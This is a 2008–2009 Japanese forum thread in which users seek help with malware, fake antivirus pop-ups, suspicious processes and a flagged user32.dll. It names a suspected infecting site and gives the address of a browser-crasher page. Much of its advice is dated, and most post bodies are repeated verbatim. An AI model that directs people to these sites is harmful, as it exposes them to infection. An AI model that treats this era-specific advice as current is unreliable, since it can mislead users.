【感染する疑いのあるサイト⇒】ttp://www.comsn.c o m
268 : ◆N9P3SuvBPo :2008/12/27(土) 20:58:13
>267
行って来た
真っ白なページ
んで、ソース見たら怪しげなコードが…
JavaScriptを切っていれば無害?
行って来た
真っ白なページ
んで、ソース見たら怪しげなコードが…
JavaScriptを切っていれば無害?
269 :名無しさん@お腹いっぱい。:2008/12/28(日) 02:05:34
>>267
アグスによる調査結果(事業閉鎖の案内は確認できる)
ttp://www.aguse.jp/?m=w&url=124.146.222.167&x=35&y=2
該当HPソース内の<head>...%エスケープされた難読化ファイル...</head>
間のスクリプト調査結果。
ttp://www.virustotal.com/jp/analisis/6d6eb4129e5ed458e7588b0a8c92a001
検出された、トロイの木馬の説明(以下説明の新種と思われる)
ttp://www.f-secure.co.jp/v-descs/v-descs3/JS-Agent-D-jp.htm
サーバホスティングサービス(株式会社NTTPCコミュニケーションズ)
技術サポートに報告しました。
virustotalの結果を見ると、新種のようで少数のベンダーしか検出出来ていないの
で踏むのは危険ですねぇ。マジ迷惑な会社ですね。消え去った後も悪意をばらまい
ている
アグスによる調査結果(事業閉鎖の案内は確認できる)
ttp://www.aguse.jp/?m=w&url=124.146.222.167&x=35&y=2
該当HPソース内の<head>...%エスケープされた難読化ファイル...</head>
間のスクリプト調査結果。
ttp://www.virustotal.com/jp/analisis/6d6eb4129e5ed458e7588b0a8c92a001
検出された、トロイの木馬の説明(以下説明の新種と思われる)
ttp://www.f-secure.co.jp/v-descs/v-descs3/JS-Agent-D-jp.htm
サーバホスティングサービス(株式会社NTTPCコミュニケーションズ)
技術サポートに報告しました。
virustotalの結果を見ると、新種のようで少数のベンダーしか検出出来ていないの
で踏むのは危険ですねぇ。マジ迷惑な会社ですね。消え去った後も悪意をばらまい
ている
270 :名無しさん@お腹いっぱい。:2008/12/28(日) 04:12:07
デコードしてみたけど、何も無かった。
271 :名無しさん@お腹いっぱい。:2008/12/28(日) 20:26:42
なんだなんだ。
272 :名無しさん@お腹いっぱい。:2008/12/30(火) 00:22:18
273 :名無しさん@お腹いっぱい。:2008/12/30(火) 02:42:46
【使用OS】 「XPホームエディション」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「カスペルスキー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」
【スパイウェア対策ソフト】 「?上記」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有」
現在の状況:興味でえっちなアングラサイトを見てしまったらトロイやらワームやらてんこ盛りで感染
カスペルスキーでスキャン駆除をする前に
Windows Security Centerがピコピコ光ってたのでなんだろうとクリック
Antivirus2009に誘導されインストールを安易に触ってしまったら
貴方のPcは242個の脅威に感染してますから課金してねというページが表示
カスペルスキーあるからそっちで駆除してもらったのですが
その後もセキュリティセンターの「242個の警告」と、Antivirusの課金ページが勝手に表示されます・・・
ゲームや作業しててもいきなり表示されてそのたびに中断されてしまう状態で
削除したくともソレに該当する項目も無く
アプリの追加削除にも該当ナシで困ってます。
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「カスペルスキー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」
【スパイウェア対策ソフト】 「?上記」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有」
現在の状況:興味でえっちなアングラサイトを見てしまったらトロイやらワームやらてんこ盛りで感染
カスペルスキーでスキャン駆除をする前に
Windows Security Centerがピコピコ光ってたのでなんだろうとクリック
Antivirus2009に誘導されインストールを安易に触ってしまったら
貴方のPcは242個の脅威に感染してますから課金してねというページが表示
カスペルスキーあるからそっちで駆除してもらったのですが
その後もセキュリティセンターの「242個の警告」と、Antivirusの課金ページが勝手に表示されます・・・
ゲームや作業しててもいきなり表示されてそのたびに中断されてしまう状態で
削除したくともソレに該当する項目も無く
アプリの追加削除にも該当ナシで困ってます。
274 :名無しさん@お腹いっぱい。:2008/12/30(火) 03:01:20
>>273
http://pc11.2ch.net/test/read.cgi/sec/1216540253/
http://pc11.2ch.net/test/read.cgi/sec/1162464139/
http://pc11.2ch.net/test/read.cgi/sec/1216540253/
http://pc11.2ch.net/test/read.cgi/sec/1162464139/
275 :名無しさん@お腹いっぱい。:2008/12/30(火) 22:05:09
【使用OS】 「XP Home sp2」
【Microsoft Update(MU)の状態】 「sp3への更新をしてない状態」
【使用セキュリティソフトとバージョン】 「avast4.8Home」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「ついさっき入れたばかり」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Win32:SysPatch[Wrm]」
昨日うっかりあやしいページを踏んで感染
その後起動するたびにavastがウイルス発見しますた!!といちいちアラートを出すのだが、
SYSTEM32内USER32.DLLに感染しているみたいで削除も修復もチェストもなんにもできない
ググってみてもそれらしい項目が出てこないしで困った
avastのことだから誤検出かと思ったんだが気味が悪い
【Microsoft Update(MU)の状態】 「sp3への更新をしてない状態」
【使用セキュリティソフトとバージョン】 「avast4.8Home」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「ついさっき入れたばかり」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Win32:SysPatch[Wrm]」
昨日うっかりあやしいページを踏んで感染
その後起動するたびにavastがウイルス発見しますた!!といちいちアラートを出すのだが、
SYSTEM32内USER32.DLLに感染しているみたいで削除も修復もチェストもなんにもできない
ググってみてもそれらしい項目が出てこないしで困った
avastのことだから誤検出かと思ったんだが気味が悪い
276 : ◆N9P3SuvBPo :2008/12/30(火) 23:38:23
>275
正規ファイルのc:\windows\system32\user32.dllに感染か?
さらに詳細を知りたいので、↓のサイトでこのc:\windows\system32\user32.dllをスキャンして
スクリーンショットを取って結果をうpろだに上げてください。
ttp://www.virustotal.com/jp/
正規ファイルのc:\windows\system32\user32.dllに感染か?
さらに詳細を知りたいので、↓のサイトでこのc:\windows\system32\user32.dllをスキャンして
スクリーンショットを取って結果をうpろだに上げてください。
ttp://www.virustotal.com/jp/
277 :名無しさん@お腹いっぱい。:2008/12/30(火) 23:52:51
>>276
システム上重要なファイルなのか知らないが、
0 bytes size received / Se ha recibido un archivo vacio
と表示されるだけで他は何もでなかった
インストールして送るソフトも使ったが駄目だった
でもavastやらウイルスバスターでオンラインスキャンしたら、
相変わらず何の処理も選べなかったけど今は再起動しても何故かavastは騒がなくなったわ
システム上重要なファイルなのか知らないが、
0 bytes size received / Se ha recibido un archivo vacio
と表示されるだけで他は何もでなかった
インストールして送るソフトも使ったが駄目だった
でもavastやらウイルスバスターでオンラインスキャンしたら、
相変わらず何の処理も選べなかったけど今は再起動しても何故かavastは騒がなくなったわ
278 : ◆N9P3SuvBPo :2008/12/30(火) 23:59:17
>277
なんだったんだろうね?
もう一度c:\windows\system32\user32.dllのファイルサイズを教えてください。
なんだったんだろうね?
もう一度c:\windows\system32\user32.dllのファイルサイズを教えてください。
279 :名無しさん@お腹いっぱい。:2008/12/31(水) 00:05:40
280 : ◆N9P3SuvBPo :2008/12/31(水) 00:21:34
>279
環境によるかもしれないけど俺は
サイズ=574,464バイト
ディスク上のサイズ=577,536バイトですね
作成日時は2005年12月22日、19:05:40
更新日が2005年3月3日、3:09:44ですね
常駐してる対策ソフトが検出しなくなったのなら、
たぶんもう大丈夫だろう。
環境によるかもしれないけど俺は
サイズ=574,464バイト
ディスク上のサイズ=577,536バイトですね
作成日時は2005年12月22日、19:05:40
更新日が2005年3月3日、3:09:44ですね
常駐してる対策ソフトが検出しなくなったのなら、
たぶんもう大丈夫だろう。
281 :名無しさん@お腹いっぱい。:2008/12/31(水) 01:23:42
>>280
安心していたのもつかの間、またavastが騒ぎ出しました
なんで修復できないのかなって思ってたら読み取りモードだったかららしい
とりあえずuser32.dllをコピーして別の場所へ移してから読み取りモードを外してさっきのURLを再チャレンジ
結果が長くてどこまでスクショとればわからなかったけど一応これで…
http://www.e-kuraberu.net/uploader/src/kuraberu7608.jpg.html
安心していたのもつかの間、またavastが騒ぎ出しました
なんで修復できないのかなって思ってたら読み取りモードだったかららしい
とりあえずuser32.dllをコピーして別の場所へ移してから読み取りモードを外してさっきのURLを再チャレンジ
結果が長くてどこまでスクショとればわからなかったけど一応これで…
http://www.e-kuraberu.net/uploader/src/kuraberu7608.jpg.html
282 :名無しさん@お腹いっぱい。:2008/12/31(水) 01:34:58
あっ281のパス忘れてた 4109です
283 : ◆N9P3SuvBPo :2008/12/31(水) 02:54:50
>281
複数のベンダーが検出してるとこ見ると、誤検出ではないですね。
正規ファイルの感染…どう対応しようか?
system32内にuser32.dllありますよね。
通常モードのまま(セーフモードなら一旦再起動して通常モードで立ち上げる)
名前をuser32.bakにリネームしてください。
しばらく待っても、user32.dllが作成されないようなら
user32.bakをuser32.dllに戻してください。
複数のベンダーが検出してるとこ見ると、誤検出ではないですね。
正規ファイルの感染…どう対応しようか?
system32内にuser32.dllありますよね。
通常モードのまま(セーフモードなら一旦再起動して通常モードで立ち上げる)
名前をuser32.bakにリネームしてください。
しばらく待っても、user32.dllが作成されないようなら
user32.bakをuser32.dllに戻してください。
284 :名無しさん@お腹いっぱい。:2008/12/31(水) 05:30:32
ttp://dropfile.freehostia.com/house/house.html
バーボンハウスって名前のブラクラ?サイトなんですが
ウィンドウが沢山開くわけでもなく、何をやってるのかよくわかりません
このサイトは何をしてくるのでしょうか?
バーボンハウスって名前のブラクラ?サイトなんですが
ウィンドウが沢山開くわけでもなく、何をやってるのかよくわかりません
このサイトは何をしてくるのでしょうか?
285 :名無しさん@お腹いっぱい。:2008/12/31(水) 05:59:57
>>284
完全にスレ違いだが
そこにアクセスすると何回も強制的にページを読み込まされる。
するとPCに負荷がかかるわけだが、自分の環境では特に被害は無い。
窓やタブを大量に開くだけがブラクラってわけじゃない
ブラクラって分かってるのなら安易に踏まないように。
完全にスレ違いだが
そこにアクセスすると何回も強制的にページを読み込まされる。
するとPCに負荷がかかるわけだが、自分の環境では特に被害は無い。
窓やタブを大量に開くだけがブラクラってわけじゃない
ブラクラって分かってるのなら安易に踏まないように。
286 :名無しさん@お腹いっぱい。:2008/12/31(水) 06:08:01
スレ違いすいませんでした
よくわかりました、ありがとうございました
よくわかりました、ありがとうございました
287 :名無しさん@お腹いっぱい。:2008/12/31(水) 12:39:30
>>283
user32.dllをuser32.bakに変えたらちゃんとuser32.dllが作成されました
サイズを調べたら283さんと同じ574,464バイト、ディスク上が577,536バイトに戻っていました
作成されたdllをスキャンしても何も反応はなかったので恐らく正常な形になったんだと思います
その後再起動してみても何もuser32.dllの警告らしきものはでなかったので、先ほどリネームしたbakを削除しましたがこれで処理できたということでしょうか
user32.dllをuser32.bakに変えたらちゃんとuser32.dllが作成されました
サイズを調べたら283さんと同じ574,464バイト、ディスク上が577,536バイトに戻っていました
作成されたdllをスキャンしても何も反応はなかったので恐らく正常な形になったんだと思います
その後再起動してみても何もuser32.dllの警告らしきものはでなかったので、先ほどリネームしたbakを削除しましたがこれで処理できたということでしょうか
288 : ◆N9P3SuvBPo :2008/12/31(水) 13:11:14
>287
はい、OKです。(Windowsのシステム保護機能が効いたようです)
あとはAvastで全ドライブをスキャンして、何も検出されなければ解決です。
それと
>とりあえずuser32.dllをコピーして別の場所へ移してから
別の場所に移動したuser32.dllのコピーも削除してください。
はい、OKです。(Windowsのシステム保護機能が効いたようです)
あとはAvastで全ドライブをスキャンして、何も検出されなければ解決です。
それと
>とりあえずuser32.dllをコピーして別の場所へ移してから
別の場所に移動したuser32.dllのコピーも削除してください。
289 :名無しさん@お腹いっぱい。:2009/01/04(日) 23:19:56
テンプレ使用ご容赦下さい
キンタマや山田ウィルス等のウィルス対策として、プライベートなフォルダをEFSで暗号化すれば流出してもファイルを読み取られる事は無いのでしょうか?
キンタマや山田ウィルス等のウィルス対策として、プライベートなフォルダをEFSで暗号化すれば流出してもファイルを読み取られる事は無いのでしょうか?
290 :名無しさん@お腹いっぱい。:2009/01/04(日) 23:43:39
キンタマ、山田ウイルスは板違い。
てかマルチ市ね。
てかマルチ市ね。
291 :名無しさん@お腹いっぱい。:2009/01/05(月) 02:19:26
292 :名無しさん@お腹いっぱい。:2009/01/07(水) 00:21:16
【使用OS】 「WINDOWSXP」
【Microsoft Update(MU)の状態】 「何スかそれ・・」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「多分してます」
【スパイウェア対策ソフト】 「えぇ・・ウィルスバスターじゃだめスか・・?;」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「1週間に2回ほど」
【ルータの有無】 「不明」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「脅威名:Cookie DoubleClick」
「危険度:中」
「種類 :WebブラウザのCookie」
なんか正月明けくらいに18禁サイトまわったあとにウィルス検索したらこいつが出てきて
それから今日検索してみたらまたこいつが弾かれてました;
でも今日まで18禁サイトとか行ってないのになんでまた感染してるのか全くわかりません
何かに入っちゃってるんでしょうか?
対処策あったら教えてくださいm(__;)m
【Microsoft Update(MU)の状態】 「何スかそれ・・」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「多分してます」
【スパイウェア対策ソフト】 「えぇ・・ウィルスバスターじゃだめスか・・?;」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「1週間に2回ほど」
【ルータの有無】 「不明」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「脅威名:Cookie DoubleClick」
「危険度:中」
「種類 :WebブラウザのCookie」
なんか正月明けくらいに18禁サイトまわったあとにウィルス検索したらこいつが出てきて
それから今日検索してみたらまたこいつが弾かれてました;
でも今日まで18禁サイトとか行ってないのになんでまた感染してるのか全くわかりません
何かに入っちゃってるんでしょうか?
対処策あったら教えてくださいm(__;)m
293 :名無しさん@お腹いっぱい。:2009/01/07(水) 00:26:44
今また検索してみたらDoubleClickとAdvertisingとかいうのも増えちゃってますが・・・
やばいですかね?;
やばいですかね?;
294 :名無しさん@お腹いっぱい。:2009/01/07(水) 00:48:58
全部cookieを利用したスパイウェア。
スパイウェアといっても個人情報を盗んだりはしないが、PCが重くなったりはするかも。
サードパーティーのcookieを拒否すれば大抵のものは弾けると思う。
そんなことより
>【Microsoft Update(MU)の状態】 「何スかそれ・・」
今すぐやって来い。詳細はググれ。
スパイウェアといっても個人情報を盗んだりはしないが、PCが重くなったりはするかも。
サードパーティーのcookieを拒否すれば大抵のものは弾けると思う。
そんなことより
>【Microsoft Update(MU)の状態】 「何スかそれ・・」
今すぐやって来い。詳細はググれ。
295 :名無しさん@お腹いっぱい。:2009/01/07(水) 08:14:09
了解です!
296 :名無しさん@お腹いっぱい。:2009/01/07(水) 18:34:19
TrackingCookieはスパイウエアじゃねえが・・・・・・
297 :名無しさん@お腹いっぱい。:2009/01/07(水) 20:55:23
【使用OS】 「xp pro sp3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「ウイルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
今日行った検索でTROJ_Generic.DITというものが見つかりました
以下のものに感染していたようです
wingogo.ex_
CyberLink\PowerDVD\Language\Enu\pdvd7_dvdaudio\pdvd7_dvdaudio.html
CyberLink\PowerDVD\Language\Kor\pdvd7_dvdaudio\pdvd7_dvdaudio.html
compile\petit\readme_e.html
感染ファイルは隔離後に削除してます
その後の手動検索ではみつかってません
TROJ_Generic.DITがどんなウイルスなのか検索してもうまく見つからず
削除しとけば安心なのか心配です
対策法をご教授いただけたらと思います
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「ウイルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
今日行った検索でTROJ_Generic.DITというものが見つかりました
以下のものに感染していたようです
wingogo.ex_
CyberLink\PowerDVD\Language\Enu\pdvd7_dvdaudio\pdvd7_dvdaudio.html
CyberLink\PowerDVD\Language\Kor\pdvd7_dvdaudio\pdvd7_dvdaudio.html
compile\petit\readme_e.html
感染ファイルは隔離後に削除してます
その後の手動検索ではみつかってません
TROJ_Generic.DITがどんなウイルスなのか検索してもうまく見つからず
削除しとけば安心なのか心配です
対策法をご教授いただけたらと思います
298 :名無しさん@お腹いっぱい。:2009/01/07(水) 21:32:56
>>297
隔離したファイルはすぐに削除せずにしばらく様子見した方がいいよ
実は誤検知で、数日後に定義の修正があること多いからね
VirusTotalとかJotti's malware scanを利用するといい
隔離したファイルはすぐに削除せずにしばらく様子見した方がいいよ
実は誤検知で、数日後に定義の修正があること多いからね
VirusTotalとかJotti's malware scanを利用するといい
299 :名無しさん@お腹いっぱい。:2009/01/07(水) 21:47:59
個人情報が入っているファイルがあって、それはWinRARでパスワードを掛けて圧縮していて
編集するときは、一時的にTempファイルに解凍した状態でファイルに保存することなく編集するようにしています
それが、いつのまにか勝手にデスクトップに解凍されているという現象が今までに2度ほど起きているのですが、
これはトロイ等に感染していると思ったほうがいいのでしょうか?
ノートンを使用しているので、ノートンでスキャンを行うも2度とも検出されませんでした
非常に不安になり2度とも変更が必要と思われる情報は変更を行ったのですが今のところ実害はない状態です
編集するときは、一時的にTempファイルに解凍した状態でファイルに保存することなく編集するようにしています
それが、いつのまにか勝手にデスクトップに解凍されているという現象が今までに2度ほど起きているのですが、
これはトロイ等に感染していると思ったほうがいいのでしょうか?
ノートンを使用しているので、ノートンでスキャンを行うも2度とも検出されませんでした
非常に不安になり2度とも変更が必要と思われる情報は変更を行ったのですが今のところ実害はない状態です
300 :名無しさん@お腹いっぱい。:2009/01/07(水) 22:33:25
すみません、テンプレ読んでませんでした。
どうかよろしくお願いします。
【使用OS】 Windows XP Pro SP3
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 Norton Internet Security (10.2.0.30)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」
どうかよろしくお願いします。
【使用OS】 Windows XP Pro SP3
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 Norton Internet Security (10.2.0.30)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」
301 :名無しさん@お腹いっぱい。:2009/01/07(水) 22:33:56
299=300です
302 :名無しさん@お腹いっぱい。:2009/01/08(木) 23:44:00
trdhost.exe とは何者でしょうか?rdhost.exeではなく tdrhost.exeでした。
Googleで調べても出てこず,不安になって消しましたが,いったい何だったのか逆に不安になってきました。
回線が上りも下りも微妙に使っている状態だったので不審に思いタスクマネージャをみると,CPU使用率が1〜3になっては0になる不振なexeを見つけました。
それがtrdhost.exeなのですが,窓の手を見る限りスタートアップではないし,ウイルスバスターも反応せず,そもそも情報がないということで気味が悪いです。
消したら不振なデータ移送は止まりましたが,不安です……
どなたかtrdhost.exeについてご存じの方は,お教えください……
【使用OS】 「Win XP pro SP3」
【使用セキュリティソフトとバージョン】 「セキュリティ対策ツール Ver. 1.5 (ウイルスバスター?)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「上記のものがが兼ねてると思う」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「NTT光プレミアムから借りてるルーター」
Googleで調べても出てこず,不安になって消しましたが,いったい何だったのか逆に不安になってきました。
回線が上りも下りも微妙に使っている状態だったので不審に思いタスクマネージャをみると,CPU使用率が1〜3になっては0になる不振なexeを見つけました。
それがtrdhost.exeなのですが,窓の手を見る限りスタートアップではないし,ウイルスバスターも反応せず,そもそも情報がないということで気味が悪いです。
消したら不振なデータ移送は止まりましたが,不安です……
どなたかtrdhost.exeについてご存じの方は,お教えください……
【使用OS】 「Win XP pro SP3」
【使用セキュリティソフトとバージョン】 「セキュリティ対策ツール Ver. 1.5 (ウイルスバスター?)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「上記のものがが兼ねてると思う」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「NTT光プレミアムから借りてるルーター」
303 : ◆N9P3SuvBPo :2009/01/09(金) 01:00:29
>302
tdrhost.exeのプロパティを見れば、大まかな情報は分かる
怪しいと思ったらvirustotalでスキャンして正体を突き止める
tdrhost.exeのプロパティを見れば、大まかな情報は分かる
怪しいと思ったらvirustotalでスキャンして正体を突き止める
304 :名無しさん@お腹いっぱい。:2009/01/09(金) 01:45:51
tdrなのかtrdなのか
305 :302:2009/01/09(金) 01:54:51
>>303-304 trdです。C:\WINDOWS\Prefetch 内に TRDHOST.EXE-2EAF3965.pf がありましたが,本体とおぼしき物は見つかりませんでした。
これをVirustotalでスキャンしましたが,何も反応はありませんでした。
取りあえず今のところは問題ないので,様子を見てみようと思います。ありがとうございました。
これをVirustotalでスキャンしましたが,何も反応はありませんでした。
取りあえず今のところは問題ないので,様子を見てみようと思います。ありがとうございました。
306 :名無しさん@お腹いっぱい。:2009/01/09(金) 13:25:36
307 :名無しさん@お腹いっぱい。:2009/01/09(金) 19:08:09
>>299
WinRARは機能豊富だから、オペミスでは?気になるなら複数のベンダーでオンラインスキャン
してみると良いよ。
>>305
プリフェッチファイル(pf)は本体と別の形式だから、それ調べてみても詳細は判らないよ。
よく「消してしまった」の後で、ウイルスですか?質問多いけど、隔離されてるなら心配な
いから、303の言うようにまず調べてみるのがよいね。
WinRARは機能豊富だから、オペミスでは?気になるなら複数のベンダーでオンラインスキャン
してみると良いよ。
>>305
プリフェッチファイル(pf)は本体と別の形式だから、それ調べてみても詳細は判らないよ。
よく「消してしまった」の後で、ウイルスですか?質問多いけど、隔離されてるなら心配な
いから、303の言うようにまず調べてみるのがよいね。
Windows/system32/trdhost.exe が犯人だと分かりましたが,System32フォルダを覗いてもそれはありませんでした。
とりあえずパスをvirustotalに打ち込むと何やらアップロードしたら,いくつかの検査ソフトが反応していました。
しかし『隠しファイルを表示する』にしてもtrdは見えず,消すことが出来ません。
プロセスに表示されるので存在するのでしょうが……
またあれから注意深く監視してみましたが,勝手に送受信するようなことはありませんでした。
なので時限爆弾を抱えてるつもりで,ウイルスとして判断されるまで付き合っていくしかありません……
とりあえずパスをvirustotalに打ち込むと何やらアップロードしたら,いくつかの検査ソフトが反応していました。
しかし『隠しファイルを表示する』にしてもtrdは見えず,消すことが出来ません。
プロセスに表示されるので存在するのでしょうが……
またあれから注意深く監視してみましたが,勝手に送受信するようなことはありませんでした。
なので時限爆弾を抱えてるつもりで,ウイルスとして判断されるまで付き合っていくしかありません……
309 :名無しさん@お腹いっぱい。:2009/01/10(土) 00:29:32
ファイルとレジストリは隠すのに、プロセスを隠さないルートキットなんてあるの?
310 :名無しさん@お腹いっぱい。:2009/01/10(土) 00:41:32
間抜けなルートキットなんだろ
SafeModeで見えますとかまれによくある
SafeModeで見えますとかまれによくある
311 :名無しさん@お腹いっぱい。:2009/01/10(土) 00:50:15
312 :名無しさん@お腹いっぱい。:2009/01/10(土) 17:25:04
313 :名無しさん@お腹いっぱい。:2009/01/11(日) 10:06:43
314 :名無しさん@お腹いっぱい。:2009/01/11(日) 13:44:41
★質問用テンプレ★
【使用OS】 「WindowsXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! バージョン4.8-1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Spybot-Search&Destroy」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
・DoubleClick
・KGBkeylogger
・Microsoft.Windows.Explorer
・Microsoft.WindowsSecurityCenter.TaskManager
・Right Media
Spybot-Search&Destroyで何度削除しても検知されます。
【使用OS】 「WindowsXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! バージョン4.8-1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Spybot-Search&Destroy」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
・DoubleClick
・KGBkeylogger
・Microsoft.Windows.Explorer
・Microsoft.WindowsSecurityCenter.TaskManager
・Right Media
Spybot-Search&Destroyで何度削除しても検知されます。
315 :名無しさん@お腹いっぱい。:2009/01/11(日) 14:58:32
>>297
わたしも8日にウイルスバスターで検知されました。
始めてウイルス検知されたもんで(バスター2年使用)
あせって感染ファイルを確かめずに削除してしまいました…
その後手動検索しましたが何も検知されません。
大丈夫なのでしょうか。
わたしも8日にウイルスバスターで検知されました。
始めてウイルス検知されたもんで(バスター2年使用)
あせって感染ファイルを確かめずに削除してしまいました…
その後手動検索しましたが何も検知されません。
大丈夫なのでしょうか。
316 :名無しさん@お腹いっぱい。:2009/01/11(日) 20:04:23
【使用OS】 「XP home sp2」
【Microsoft Update(MU)の状態】 「最近やってません」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2007を一年延長してます」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【ルータの有無】 「NTTのを使用」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
マイスペやってたら変な所をクリックしたらしく
stabilityinternetscan.comというサイトに飛ばされ、「ウイルス感染してるから
セキュリティソフトをダウンロードしろ」とメッセージが出たので「いいえ」を
クリックして接続切ったんですが、ノートンでチェックしても異常は出ず、ググッたら
ttp://www.precisesecurity.com/blogs/2009/01/11/stabilityinternetscancom/
ttp://www.precisesecurity.com/blogs/2008/12/23/system-security/
「System security」というソフトをインストールさせるための騙しサイト
らしいとわかりました。
ユーザーの書き込みをみるとポップアップが出て来るようですが私のPCには
出て来ません。
これは感染せずに済んでいるんでしょうか?
余計なクリックせずに接続切ればよかったんでしょうが「いいえ」をクリックして
しまったので気になります。
ノートンのウイルスリストには入ってなくて感染してるかどうかがわからないんです。
【Microsoft Update(MU)の状態】 「最近やってません」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2007を一年延長してます」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【ルータの有無】 「NTTのを使用」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
マイスペやってたら変な所をクリックしたらしく
stabilityinternetscan.comというサイトに飛ばされ、「ウイルス感染してるから
セキュリティソフトをダウンロードしろ」とメッセージが出たので「いいえ」を
クリックして接続切ったんですが、ノートンでチェックしても異常は出ず、ググッたら
ttp://www.precisesecurity.com/blogs/2009/01/11/stabilityinternetscancom/
ttp://www.precisesecurity.com/blogs/2008/12/23/system-security/
「System security」というソフトをインストールさせるための騙しサイト
らしいとわかりました。
ユーザーの書き込みをみるとポップアップが出て来るようですが私のPCには
出て来ません。
これは感染せずに済んでいるんでしょうか?
余計なクリックせずに接続切ればよかったんでしょうが「いいえ」をクリックして
しまったので気になります。
ノートンのウイルスリストには入ってなくて感染してるかどうかがわからないんです。
317 :名無しさん@お腹いっぱい。:2009/01/11(日) 20:40:38
>>316
exeをダウンロードして実行していなければ問題なし
exeをダウンロードして実行していなければ問題なし
318 :名無しさん@お腹いっぱい。:2009/01/11(日) 21:24:42
>>317
ありがとうございます、安心しました。
ありがとうございます、安心しました。
319 :名無しさん@お腹いっぱい。:2009/01/12(月) 22:10:53
最近インターネットにアクセスすると
蜘蛛のアニメーションが出てくるようになりました
画面上を動き回ります。
こいつの影響なのか接続も遅くなったようです
スキャンでは検出されません
何か良い解決策を教えてください
蜘蛛のアニメーションが出てくるようになりました
画面上を動き回ります。
こいつの影響なのか接続も遅くなったようです
スキャンでは検出されません
何か良い解決策を教えてください
320 :名無しさん@お腹いっぱい。:2009/01/13(火) 00:47:48
使用OS】 Windows XP
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウイルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 済
【スパイウェア対策ソフト】 ウイルスバスター2009
【スパイウェア対策ソフトの更新は定期的に行なっているか】 済
【ルータの有無】 有
外付けHDDをチェックしたところTROJ Generic.DITが検出されました
トロイの木馬の一種のようですがググってもよく分かりません
これがどのような悪さをするのかご存知の方、教えてください
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウイルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 済
【スパイウェア対策ソフト】 ウイルスバスター2009
【スパイウェア対策ソフトの更新は定期的に行なっているか】 済
